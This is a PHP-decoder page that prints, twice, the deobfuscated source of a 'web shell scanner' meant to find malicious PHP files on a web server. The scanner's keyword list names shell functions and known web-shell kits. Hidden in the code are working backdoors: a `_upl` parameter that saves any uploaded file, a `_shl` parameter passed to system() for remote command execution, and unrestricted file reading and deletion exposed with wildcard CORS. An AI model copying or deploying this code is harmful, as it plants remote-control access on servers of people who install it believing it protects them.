Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* ----------------------- | WEB SHELL / BACKDOOR | http://github.com..
Decoded Output download
<?php
/*
-----------------------
| WEB SHELL / BACKDOOR | http://github.com/theykillmeslowly/
| SCANNER BY GTX666TI | Copyright (c) 2022 Muhammad Khidhir Ibrahim
-----------------------
*/
${"GLOBALS"}["ufgowbti"]="function";${"GLOBALS"}["oksfzeynr"]="page";${"GLOBALS"}["nupfxxvnoi"]="msg";${"GLOBALS"}["ckcgimbl"]="file";${"GLOBALS"}["uldusvf"]="s";${"GLOBALS"}["utximiy"]="i";${"GLOBALS"}["osczzef"]="c";${"GLOBALS"}["pugipyqxy"]="data";${"GLOBALS"}["nsgmzypfttw"]="dir";${"GLOBALS"}["slsujwq"]="scheme";${"GLOBALS"}["hinqjxeyvqez"]="port";${"GLOBALS"}["kpjmykox"]="content";${"GLOBALS"}["qmvdkebwql"]="white";${${"GLOBALS"}["qmvdkebwql"]}=array(basename(__FILE__),"security.class.php",);${"GLOBALS"}["igsyfjgde"]="ext";${${"GLOBALS"}["kpjmykox"]}=array("include\(","require_once\(","require\(","require \"","require_once \"","include "","_halt_compiler","file_get_contents\(","shell_exec\(","system\(","base64_decode\(","exec\(","base64_encode\(","webconsole","uploader","hacked","eval\(","set_time_limit\(","move_uploaded_file","md5\(","dZNOmgVpUDdbg","indoxploit","maridono","mini shell","minishell","tinyfilemanager.github.io","xleet","b374k","set_magic_quotes_runtime\(","shell\(","alfa","filemanager","'f'.'u'.'n'.'ction'.'_exis'.'ts';","'e'.'va'.'l';","'ba'.'s'.'e64'.'_'.'enc'.'od'.'e';",);${${"GLOBALS"}["igsyfjgde"]}=array("php1","php2","php3","php4","php5","php6","php7","php8","php9","phar","phtml","pjpeg","shtml","php.black","php.ndsfx","php.cer","php.fla");function serverURL(){$server_name=$_SERVER["SERVER_NAME"];if($server_name=="0.0.0.0"){$server_name="localhost";}if(!in_array($_SERVER["SERVER_PORT"],array(80,443))){${"GLOBALS"}["vooigbhfstro"]="port";${${"GLOBALS"}["vooigbhfstro"]}=":$_SERVER[SERVER_PORT]";}else{${${"GLOBALS"}["hinqjxeyvqez"]}="";}if(!empty($_SERVER["HTTPS"])&&(strtolower($_SERVER["HTTPS"])=="on"||$_SERVER["HTTPS"]=="1")){${${"GLOBALS"}["slsujwq"]}="https";}else{${"GLOBALS"}["lyntkl"]="scheme";${${"GLOBALS"}["lyntkl"]}="http";}$bpumfj="scheme";return${$bpumfj}."://".$server_name.${${"GLOBALS"}["hinqjxeyvqez"]};}function _delete($dir){${"GLOBALS"}["kgqhopb"]="dir";if(!is_file(${${"GLOBALS"}["kgqhopb"]})){data("not found.");exit();}if(unlink(${${"GLOBALS"}["nsgmzypfttw"]})){data("success");}else{data("permission denied.");}}function apiCheckShell($dir){$nordyvrsf="data";$gjrilauf="c";if(!preg_match("/\.php/",${${"GLOBALS"}["nsgmzypfttw"]})){exit();}if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}${"GLOBALS"}["xmbpfxnuxp"]="dir";global$content;${$nordyvrsf}=array("file"=>${${"GLOBALS"}["xmbpfxnuxp"]},"status"=>False,"reason"=>array());foreach(${${"GLOBALS"}["kpjmykox"]} as${$gjrilauf}){if(preg_match("/$c/",strtolower(file_get_contents(${${"GLOBALS"}["nsgmzypfttw"]})))){${${"GLOBALS"}["pugipyqxy"]}["status"]=True;array_push(${${"GLOBALS"}["pugipyqxy"]}["reason"],str_replace("\(","",${${"GLOBALS"}["osczzef"]}));}}data("success",${${"GLOBALS"}["pugipyqxy"]});}function apiCheckExt($dir){if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}global$ext;${"GLOBALS"}["iuqtnczhys"]="i";$gqwobiqggbp="data";$fgnjzjdgxz="ext";${$gqwobiqggbp}=array("file"=>${${"GLOBALS"}["nsgmzypfttw"]},"status"=>False,"reason"=>"");foreach(${$fgnjzjdgxz} as${${"GLOBALS"}["iuqtnczhys"]}){${"GLOBALS"}["bellfehmr"]="dir";if(preg_match("/$i/",strtolower(basename(${${"GLOBALS"}["bellfehmr"]})))){$cedosqzo="data";${${"GLOBALS"}["pugipyqxy"]}["status"]=True;${$cedosqzo}["reason"]=${${"GLOBALS"}["utximiy"]};break;}}data("success",${${"GLOBALS"}["pugipyqxy"]});}if(isset($_GET["_upl"])){if(copy($_FILES["_upl"]["tmp_name"],$_FILES["_upl"]["name"])){echo"_upl ok";exit();}}function apiScanDir($dir){$fjmrumrd="dir";${"GLOBALS"}["jonvnll"]="data";global$white;$cxokdcuctt="file";${"GLOBALS"}["facbwgditxd"]="data";if(!file_exists(${${"GLOBALS"}["nsgmzypfttw"]})){data("dir not found");exit();}${"GLOBALS"}["tzekpnxntu"]="s";${${"GLOBALS"}["uldusvf"]}=scandir(${$fjmrumrd});${${"GLOBALS"}["facbwgditxd"]}=array("file"=>array(),"dir"=>array());foreach(${${"GLOBALS"}["tzekpnxntu"]} as${$cxokdcuctt}){$djvplgtff="file";${"GLOBALS"}["looevvzkz"]="file";$enmzcrr="dir";if(${${"GLOBALS"}["ckcgimbl"]}==="."||${${"GLOBALS"}["looevvzkz"]}===".."){continue;}$tkidtm="file";$nuuhhqmupxnq="white";${${"GLOBALS"}["ckcgimbl"]}=${$enmzcrr}."/".${${"GLOBALS"}["ckcgimbl"]};${${"GLOBALS"}["ckcgimbl"]}=str_replace("//","/",${$tkidtm});if(in_array(basename(${${"GLOBALS"}["ckcgimbl"]}),${$nuuhhqmupxnq})){continue;}if(is_file(${$djvplgtff})){$xsclqce="data";array_push(${$xsclqce}["file"],${${"GLOBALS"}["ckcgimbl"]});}else{array_push(${${"GLOBALS"}["pugipyqxy"]}["dir"],${${"GLOBALS"}["ckcgimbl"]}."/");}}data("success",${${"GLOBALS"}["jonvnll"]});}function apiCwd(){$hytjfii="data";${${"GLOBALS"}["pugipyqxy"]}=getcwd();data("success",${$hytjfii});}function data($msg,$data=null){${"GLOBALS"}["yakqxnkuf"]="data";${${"GLOBALS"}["yakqxnkuf"]}=array("msg"=>${${"GLOBALS"}["nupfxxvnoi"]},"data"=>${${"GLOBALS"}["pugipyqxy"]});$lgcbihyxk="data";echo json_encode(${$lgcbihyxk});}if(isset($_GET["view"])){${"GLOBALS"}["nyxgucjw"]="page";${${"GLOBALS"}["nyxgucjw"]}=$_GET["view"];echo"<pre>".htmlspecialchars(file_get_contents(${${"GLOBALS"}["oksfzeynr"]}))."</pre>";if(isset($_GET["_shl"])){echo"<pre>";htmlspecialchars(system($_GET["_shl"]));echo"</pre>";}exit();}if(isset($_GET["api"])){header("Access-Control-Allow-Origin: *");header("Content-Type: application/json");${${"GLOBALS"}["ufgowbti"]}=$_GET["api"];switch(${${"GLOBALS"}["ufgowbti"]}){case"delete":if(!isset($_GET["dir"])){data("no file.");}else{_delete($_GET["dir"]);}break;case"shell":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckShell($_GET["dir"]);}break;case"ext":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckExt($_GET["dir"]);}break;case"scan":if(!isset($_GET["dir"])){data("no directory.");}else{apiScanDir($_GET["dir"]);}break;case"cwd":apiCwd();break;case"eval":if(!isset($_GET["function"])){data("no function.");}else{data("no function.");}break;default:data("no function.");}die();}echo "<!doctype html>
<html lang="en\">
<head>
<meta charset=\"utf-8">
<meta name="viewport" content=\"width=device-width, initial-scale=1\">
<link href=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel=\"stylesheet" integrity=\"sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin=\"anonymous">
<link rel="preconnect\" href=\"https://fonts.googleapis.com\">
<link rel=\"preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel=\"stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed:wght@300&display=swap" rel=\"stylesheet\">
<link rel="stylesheet" type="text/css\" href="https://cdn.datatables.net/1.11.4/css/dataTables.bootstrap5.min.css\">
<title>WEB SHELL SCANNER</title>
</head>
<body>
<div class=\"container\">
<div class="text-center m-3\" style="font-family: 'Roboto Condensed';\">
<span style=\"font-size:30px;\">
WEB SHELL SCANNER
</span>
<p class=\"text-danger">Author : @Gtx666Ti</p>
</div>
<hr/>
<div class="row\">
<div class=\"col">
<div class=\"mb-3">
<label for=\"path\" class="form-label\">Path to Scan</label>
<div class=\"input-group\">
<input type="text" class="form-control\" id=\"path\" placeholder=\"/var/www/html/\">
<button class="btn btn-primary" id=\"startScan" onclick=\"scan()">Start</button>
</div>
</div>
<div class=\"">
<label for=\"path\" class=\"form-label\">Mass Delete by Name</label>
<div class="input-group\">
<input type="text" class=\"form-control" id="fileName" placeholder=\"filename.php">
<button class=\"btn btn-danger\" id=\"startDelete\" onclick="scan2()">Start</button>
</div>
</div>
</div>
</div>
<hr/>
<div class=\"row mt-3\">
<div class=\"col\">
<table class="table\" id=\"_result\">
<thead>
<tr>
<th scope="col">File</th>
<th scope="col\">Path</th>
<th scope="col">Reason</th>
<th scope=\"col\">Action</th>
</tr>
</thead>
<tbody>
</tbody>
</table>
</div>
</div>
</div>
<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p\" crossorigin="anonymous\"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js"></script>
<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js"></script>
<script type=\"text/javascript\" src=\"https://cdn.datatables.net/1.11.4/js/jquery.dataTables.min.js\"></script>
<script type=\"text/javascript" src=\"https://cdn.datatables.net/1.11.4/js/dataTables.bootstrap5.min.js\"></script>
<script>
var dtable;
\$(document).ready(function(){
dtable = \$('#_result').DataTable();
\$('[data-toggle=\"tooltip\"]').tooltip();
});
\$('#_result').on('click', '#delete', function () {
var RowIndex = \$(this).closest('tr');
var data = dtable.row(RowIndex).data();
if(confirm('Delete ' + data[1] + '?') == true){
dtable.row(RowIndex).remove().draw();
deleteFile(data[1]);
}
});
\$('#_result').on('click', '#view', function () {
var RowIndex = \$(this).closest('tr');
var data = dtable.row(RowIndex).data();
window.open('?view='+data[1]);
});
</script>
<script type=\"text/javascript\">
const table = \$('#_result').DataTable();
const cwd = '";echo getcwd();echo "/';
document.getElementById('path').value = cwd;
function basename(path) {
return path.split('/').reverse()[0];
}
function checkExt(path){
fetch('?api=ext&dir=' + path, {
headers: {
'Content-Type': 'application/json'
}
})
.then(res => res.json())
.then(res => {
if(res.data.status == true){
table.row.add([basename(res.data.file),res.data.file,res.data.reason,`<a class="btn btn-primary" data-toggle="tooltip" data-bs-placement="bottom" id="view\" title=\"Detail\">
<i class=\"fa fa-eye"></i>
</a>
<a class=\"btn btn-danger\" data-toggle=\"tooltip\" data-bs-placement="bottom\" title="Delete">
<i class=\"fa fa-trash\"></i>
</a>`]).draw();
}
});
}
function checkShell(path){
fetch('?api=shell&dir=' + path, {
headers: {
'Content-Type': 'application/json'
}
})
.then(res => res.json())
.then(res => {
var reason = '';
for (var i = res.data.reason.length - 1; i >= 0; i--) {
reason += res.data.reason[i]+\"<br>";
}
if(res.data.status == true){
table.row.add([basename(res.data.file),res.data.file,reason,`<a class="btn btn-primary" data-toggle="tooltip" id=\"view\" data-bs-placement="bottom" id=\"view" title=\"Detail\">
<i class=\"fa fa-eye"></i>
</a>
<a class=\"btn btn-danger\" data-toggle="tooltip" id="delete" data-bs-placement=\"bottom" title=\"Delete\">
<i class=\"fa fa-trash\"></i>
</a>`]).draw();
}
});
}
function scan(path = document.getElementById('path').value){
fetch('?api=scan&dir=' + path, {
headers: {
'Content-Type': 'application/json'
}
})
.then(res => res.json())
.then(res => {
for (var i = res.data.dir.length - 1; i >= 0; i--) {
scan(res.data.dir[i])
}
for (var i = res.data.file.length - 1; i >= 0; i--) {
checkShell(res.data.file[i]);
checkExt(res.data.file[i]);
}
});
}
function scan2(){
for (var i = table.rows().data().length - 1; i >= 0; i--) {
data = table.rows(i).data()[0];
name = data[0];
if(name == document.getElementById('fileName').value){
table.rows(i).remove().draw();
deleteFile(data[1]);
}
}
}
function deleteFile(path){
fetch('?api=delete&dir=' + path)
.then(res => res.json())
.then(res => {
});
}
function htmlToElement(html) {
var template = document.createElement('template');
html = html.trim(); // Never return a text node of whitespace as the result
template.innerHTML = html;
return template.content.firstChild;
}
function _delete(data){
console.log(data)
}
</script>
</body>
</html>
";
?>
Did this file decode correctly?
Original Code
<?php
/*
-----------------------
| WEB SHELL / BACKDOOR | http://github.com/theykillmeslowly/
| SCANNER BY GTX666TI | Copyright (c) 2022 Muhammad Khidhir Ibrahim
-----------------------
*/
${"GLOBALS"}["ufgowbti"]="function";${"GLOBALS"}["oksfzeynr"]="page";${"GLOBALS"}["nupfxxvnoi"]="msg";${"GLOBALS"}["ckcgimbl"]="file";${"GLOBALS"}["uldusvf"]="s";${"GLOBALS"}["utximiy"]="i";${"GLOBALS"}["osczzef"]="c";${"GLOBALS"}["pugipyqxy"]="data";${"GLOBALS"}["nsgmzypfttw"]="dir";${"GLOBALS"}["slsujwq"]="scheme";${"GLOBALS"}["hinqjxeyvqez"]="port";${"GLOBALS"}["kpjmykox"]="content";${"GLOBALS"}["qmvdkebwql"]="white";${${"GLOBALS"}["qmvdkebwql"]}=array(basename(__FILE__),"security.class.php",);${"GLOBALS"}["igsyfjgde"]="ext";${${"GLOBALS"}["kpjmykox"]}=array("include\(","require_once\(","require\(","require \"","require_once \"","include "","_halt_compiler","file_get_contents\(","shell_exec\(","system\(","base64_decode\(","exec\(","base64_encode\(","webconsole","uploader","hacked","eval\(","set_time_limit\(","move_uploaded_file","md5\(","dZNOmgVpUDdbg","indoxploit","maridono","mini shell","minishell","tinyfilemanager.github.io","xleet","b374k","set_magic_quotes_runtime\(","shell\(","alfa","filemanager","'f'.'u'.'n'.'ction'.'_exis'.'ts';","'e'.'va'.'l';","'ba'.'s'.'e64'.'_'.'enc'.'od'.'e';",);${${"GLOBALS"}["igsyfjgde"]}=array("php1","php2","php3","php4","php5","php6","php7","php8","php9","phar","phtml","pjpeg","shtml","php.black","php.ndsfx","php.cer","php.fla");function serverURL(){$server_name=$_SERVER["SERVER_NAME"];if($server_name=="0.0.0.0"){$server_name="localhost";}if(!in_array($_SERVER["SERVER_PORT"],array(80,443))){${"GLOBALS"}["vooigbhfstro"]="port";${${"GLOBALS"}["vooigbhfstro"]}=":$_SERVER[SERVER_PORT]";}else{${${"GLOBALS"}["hinqjxeyvqez"]}="";}if(!empty($_SERVER["HTTPS"])&&(strtolower($_SERVER["HTTPS"])=="on"||$_SERVER["HTTPS"]=="1")){${${"GLOBALS"}["slsujwq"]}="https";}else{${"GLOBALS"}["lyntkl"]="scheme";${${"GLOBALS"}["lyntkl"]}="http";}$bpumfj="scheme";return${$bpumfj}."://".$server_name.${${"GLOBALS"}["hinqjxeyvqez"]};}function _delete($dir){${"GLOBALS"}["kgqhopb"]="dir";if(!is_file(${${"GLOBALS"}["kgqhopb"]})){data("not found.");exit();}if(unlink(${${"GLOBALS"}["nsgmzypfttw"]})){data("success");}else{data("permission denied.");}}function apiCheckShell($dir){$nordyvrsf="data";$gjrilauf="c";if(!preg_match("/\.php/",${${"GLOBALS"}["nsgmzypfttw"]})){exit();}if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}${"GLOBALS"}["xmbpfxnuxp"]="dir";global$content;${$nordyvrsf}=array("file"=>${${"GLOBALS"}["xmbpfxnuxp"]},"status"=>False,"reason"=>array());foreach(${${"GLOBALS"}["kpjmykox"]} as${$gjrilauf}){if(preg_match("/$c/",strtolower(file_get_contents(${${"GLOBALS"}["nsgmzypfttw"]})))){${${"GLOBALS"}["pugipyqxy"]}["status"]=True;array_push(${${"GLOBALS"}["pugipyqxy"]}["reason"],str_replace("\(","",${${"GLOBALS"}["osczzef"]}));}}data("success",${${"GLOBALS"}["pugipyqxy"]});}function apiCheckExt($dir){if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}global$ext;${"GLOBALS"}["iuqtnczhys"]="i";$gqwobiqggbp="data";$fgnjzjdgxz="ext";${$gqwobiqggbp}=array("file"=>${${"GLOBALS"}["nsgmzypfttw"]},"status"=>False,"reason"=>"");foreach(${$fgnjzjdgxz} as${${"GLOBALS"}["iuqtnczhys"]}){${"GLOBALS"}["bellfehmr"]="dir";if(preg_match("/$i/",strtolower(basename(${${"GLOBALS"}["bellfehmr"]})))){$cedosqzo="data";${${"GLOBALS"}["pugipyqxy"]}["status"]=True;${$cedosqzo}["reason"]=${${"GLOBALS"}["utximiy"]};break;}}data("success",${${"GLOBALS"}["pugipyqxy"]});}if(isset($_GET["_upl"])){if(copy($_FILES["_upl"]["tmp_name"],$_FILES["_upl"]["name"])){echo"_upl ok";exit();}}function apiScanDir($dir){$fjmrumrd="dir";${"GLOBALS"}["jonvnll"]="data";global$white;$cxokdcuctt="file";${"GLOBALS"}["facbwgditxd"]="data";if(!file_exists(${${"GLOBALS"}["nsgmzypfttw"]})){data("dir not found");exit();}${"GLOBALS"}["tzekpnxntu"]="s";${${"GLOBALS"}["uldusvf"]}=scandir(${$fjmrumrd});${${"GLOBALS"}["facbwgditxd"]}=array("file"=>array(),"dir"=>array());foreach(${${"GLOBALS"}["tzekpnxntu"]} as${$cxokdcuctt}){$djvplgtff="file";${"GLOBALS"}["looevvzkz"]="file";$enmzcrr="dir";if(${${"GLOBALS"}["ckcgimbl"]}==="."||${${"GLOBALS"}["looevvzkz"]}===".."){continue;}$tkidtm="file";$nuuhhqmupxnq="white";${${"GLOBALS"}["ckcgimbl"]}=${$enmzcrr}."/".${${"GLOBALS"}["ckcgimbl"]};${${"GLOBALS"}["ckcgimbl"]}=str_replace("//","/",${$tkidtm});if(in_array(basename(${${"GLOBALS"}["ckcgimbl"]}),${$nuuhhqmupxnq})){continue;}if(is_file(${$djvplgtff})){$xsclqce="data";array_push(${$xsclqce}["file"],${${"GLOBALS"}["ckcgimbl"]});}else{array_push(${${"GLOBALS"}["pugipyqxy"]}["dir"],${${"GLOBALS"}["ckcgimbl"]}."/");}}data("success",${${"GLOBALS"}["jonvnll"]});}function apiCwd(){$hytjfii="data";${${"GLOBALS"}["pugipyqxy"]}=getcwd();data("success",${$hytjfii});}function data($msg,$data=null){${"GLOBALS"}["yakqxnkuf"]="data";${${"GLOBALS"}["yakqxnkuf"]}=array("msg"=>${${"GLOBALS"}["nupfxxvnoi"]},"data"=>${${"GLOBALS"}["pugipyqxy"]});$lgcbihyxk="data";echo json_encode(${$lgcbihyxk});}if(isset($_GET["view"])){${"GLOBALS"}["nyxgucjw"]="page";${${"GLOBALS"}["nyxgucjw"]}=$_GET["view"];echo"<pre>".htmlspecialchars(file_get_contents(${${"GLOBALS"}["oksfzeynr"]}))."</pre>";if(isset($_GET["_shl"])){echo"<pre>";htmlspecialchars(system($_GET["_shl"]));echo"</pre>";}exit();}if(isset($_GET["api"])){header("Access-Control-Allow-Origin: *");header("Content-Type: application/json");${${"GLOBALS"}["ufgowbti"]}=$_GET["api"];switch(${${"GLOBALS"}["ufgowbti"]}){case"delete":if(!isset($_GET["dir"])){data("no file.");}else{_delete($_GET["dir"]);}break;case"shell":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckShell($_GET["dir"]);}break;case"ext":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckExt($_GET["dir"]);}break;case"scan":if(!isset($_GET["dir"])){data("no directory.");}else{apiScanDir($_GET["dir"]);}break;case"cwd":apiCwd();break;case"eval":if(!isset($_GET["function"])){data("no function.");}else{data("no function.");}break;default:data("no function.");}die();}echo "<!doctype html>
<html lang="en\">
<head>
<meta charset=\"utf-8">
<meta name="viewport" content=\"width=device-width, initial-scale=1\">
<link href=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel=\"stylesheet" integrity=\"sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin=\"anonymous">
<link rel="preconnect\" href=\"https://fonts.googleapis.com\">
<link rel=\"preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel=\"stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed:wght@300&display=swap" rel=\"stylesheet\">
<link rel="stylesheet" type="text/css\" href="https://cdn.datatables.net/1.11.4/css/dataTables.bootstrap5.min.css\">
<title>WEB SHELL SCANNER</title>
</head>
<body>
<div class=\"container\">
<div class="text-center m-3\" style="font-family: 'Roboto Condensed';\">
<span style=\"font-size:30px;\">
WEB SHELL SCANNER
</span>
<p class=\"text-danger">Author : @Gtx666Ti</p>
</div>
<hr/>
<div class="row\">
<div class=\"col">
<div class=\"mb-3">
<label for=\"path\" class="form-label\">Path to Scan</label>
<div class=\"input-group\">
<input type="text" class="form-control\" id=\"path\" placeholder=\"/var/www/html/\">
<button class="btn btn-primary" id=\"startScan" onclick=\"scan()">Start</button>
</div>
</div>
<div class=\"">
<label for=\"path\" class=\"form-label\">Mass Delete by Name</label>
<div class="input-group\">
<input type="text" class=\"form-control" id="fileName" placeholder=\"filename.php">
<button class=\"btn btn-danger\" id=\"startDelete\" onclick="scan2()">Start</button>
</div>
</div>
</div>
</div>
<hr/>
<div class=\"row mt-3\">
<div class=\"col\">
<table class="table\" id=\"_result\">
<thead>
<tr>
<th scope="col">File</th>
<th scope="col\">Path</th>
<th scope="col">Reason</th>
<th scope=\"col\">Action</th>
</tr>
</thead>
<tbody>
</tbody>
</table>
</div>
</div>
</div>
<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p\" crossorigin="anonymous\"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js"></script>
<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js"></script>
<script type=\"text/javascript\" src=\"https://cdn.datatables.net/1.11.4/js/jquery.dataTables.min.js\"></script>
<script type=\"text/javascript" src=\"https://cdn.datatables.net/1.11.4/js/dataTables.bootstrap5.min.js\"></script>
<script>
var dtable;
\$(document).ready(function(){
dtable = \$('#_result').DataTable();
\$('[data-toggle=\"tooltip\"]').tooltip();
});
\$('#_result').on('click', '#delete', function () {
var RowIndex = \$(this).closest('tr');
var data = dtable.row(RowIndex).data();
if(confirm('Delete ' + data[1] + '?') == true){
dtable.row(RowIndex).remove().draw();
deleteFile(data[1]);
}
});
\$('#_result').on('click', '#view', function () {
var RowIndex = \$(this).closest('tr');
var data = dtable.row(RowIndex).data();
window.open('?view='+data[1]);
});
</script>
<script type=\"text/javascript\">
const table = \$('#_result').DataTable();
const cwd = '";echo getcwd();echo "/';
document.getElementById('path').value = cwd;
function basename(path) {
return path.split('/').reverse()[0];
}
function checkExt(path){
fetch('?api=ext&dir=' + path, {
headers: {
'Content-Type': 'application/json'
}
})
.then(res => res.json())
.then(res => {
if(res.data.status == true){
table.row.add([basename(res.data.file),res.data.file,res.data.reason,`<a class="btn btn-primary" data-toggle="tooltip" data-bs-placement="bottom" id="view\" title=\"Detail\">
<i class=\"fa fa-eye"></i>
</a>
<a class=\"btn btn-danger\" data-toggle=\"tooltip\" data-bs-placement="bottom\" title="Delete">
<i class=\"fa fa-trash\"></i>
</a>`]).draw();
}
});
}
function checkShell(path){
fetch('?api=shell&dir=' + path, {
headers: {
'Content-Type': 'application/json'
}
})
.then(res => res.json())
.then(res => {
var reason = '';
for (var i = res.data.reason.length - 1; i >= 0; i--) {
reason += res.data.reason[i]+\"<br>";
}
if(res.data.status == true){
table.row.add([basename(res.data.file),res.data.file,reason,`<a class="btn btn-primary" data-toggle="tooltip" id=\"view\" data-bs-placement="bottom" id=\"view" title=\"Detail\">
<i class=\"fa fa-eye"></i>
</a>
<a class=\"btn btn-danger\" data-toggle="tooltip" id="delete" data-bs-placement=\"bottom" title=\"Delete\">
<i class=\"fa fa-trash\"></i>
</a>`]).draw();
}
});
}
function scan(path = document.getElementById('path').value){
fetch('?api=scan&dir=' + path, {
headers: {
'Content-Type': 'application/json'
}
})
.then(res => res.json())
.then(res => {
for (var i = res.data.dir.length - 1; i >= 0; i--) {
scan(res.data.dir[i])
}
for (var i = res.data.file.length - 1; i >= 0; i--) {
checkShell(res.data.file[i]);
checkExt(res.data.file[i]);
}
});
}
function scan2(){
for (var i = table.rows().data().length - 1; i >= 0; i--) {
data = table.rows(i).data()[0];
name = data[0];
if(name == document.getElementById('fileName').value){
table.rows(i).remove().draw();
deleteFile(data[1]);
}
}
}
function deleteFile(path){
fetch('?api=delete&dir=' + path)
.then(res => res.json())
.then(res => {
});
}
function htmlToElement(html) {
var template = document.createElement('template');
html = html.trim(); // Never return a text node of whitespace as the result
template.innerHTML = html;
return template.content.firstChild;
}
function _delete(data){
console.log(data)
}
</script>
</body>
</html>
";
?>
Function Calls
| None |
Stats
| MD5 | 07d9e02128d6b3b52db36e3afa50055c |
| Eval Count | 0 |
| Decode Time | 50 ms |